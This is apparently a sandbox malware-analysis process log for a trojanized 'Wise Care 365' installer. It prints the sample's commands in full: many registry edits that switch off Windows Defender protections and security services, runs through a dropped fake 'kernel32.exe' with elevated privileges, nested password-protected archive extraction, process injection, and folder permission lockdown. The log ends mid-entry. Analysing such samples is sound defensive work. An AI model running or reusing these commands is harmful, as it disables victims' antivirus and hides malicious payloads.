[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[8] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender notification settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender notification settings
[6] C:\Windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    - Modifies security service
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Modifies security service
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
[6] C:\ProgramData\ConsoleApp\kernel32.exe | kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[7] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
[8] C:\ProgramData\ConsoleApp\kernel32.exe | "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
[9] C:\Windows\System32\reg.exe | "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
[10] C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
C:\Windows\SysWOW64\explorer.exeexplorer.exe6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\executer.bat" "5⤵
-
C:\Windows\SysWOW64\mode.commode 65,106⤵
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e file.zip -p___________24671pwd16377pwd22378___________ -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_9.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_8.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_7.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_6.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_5.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_4.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_3.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_2.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\7za.exe  6⤵
  7za.exe e extracted/file_1.zip -oextracted
- Executes dropped EXE
-
C:\ProgramData\ConsoleApp\ielowutil.exe  6⤵
  "ielowutil.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  7⤵
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
-
C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe  8⤵
  "C:\Users\Admin\AppData\Local\Temp\cmpbksrvc32.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\umciavi32.exe  8⤵
  "C:\Users\Admin\AppData\Local\Temp\umciavi32.exe"
-
C:\Windows\SysWOW64\cmd.exe  9⤵
  C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
-
C:\Windows\SysWOW64\icacls.exe  10⤵
  icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe  10⤵
  icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exe  10⤵
  icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe  8⤵
  "C:\Users\Admin\AppData\Local\Temp\nvdrivesllapi.exe"
- Checks computer location settings
-
C:\Windows\System32\cmd.exe  9⤵
  "C:\Windows\System32\cmd.exe" /c timeout 45
-
C:\Windows\system32\timeout.exe  10⤵
  timeout 45
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe  5⤵
  C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "
-
C:\Windows\SysWOW64\timeout.exe  6⤵
  timeout /T 90 /NOBREAK
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe  6⤵
  cmd /c rd /q /s "C:\ProgramData\ConsoleApp\"
-
C:\Windows\SysWOW64\timeout.exe  4⤵
  timeout /T 3 /NOBREAK
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe  3⤵
  "C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp  4⤵
  "C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$30206,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exe  1⤵
  C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exe  1⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
-
C:\ProgramData\ConsoleApp\kernel32.exe  1⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe  2⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Windows\System32\reg.exe  3⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
- Modifies security service
-
C:\Windows\System32\reg.exe  1⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
-
C:\ProgramData\ConsoleApp\kernel32.exe  1⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\ConsoleApp\kernel32.exe  2⤵
  "C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Windows\System32\reg.exe  3⤵
  "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
- Modifies security service
-
C:\Windows\System32\reg.exe  1⤵
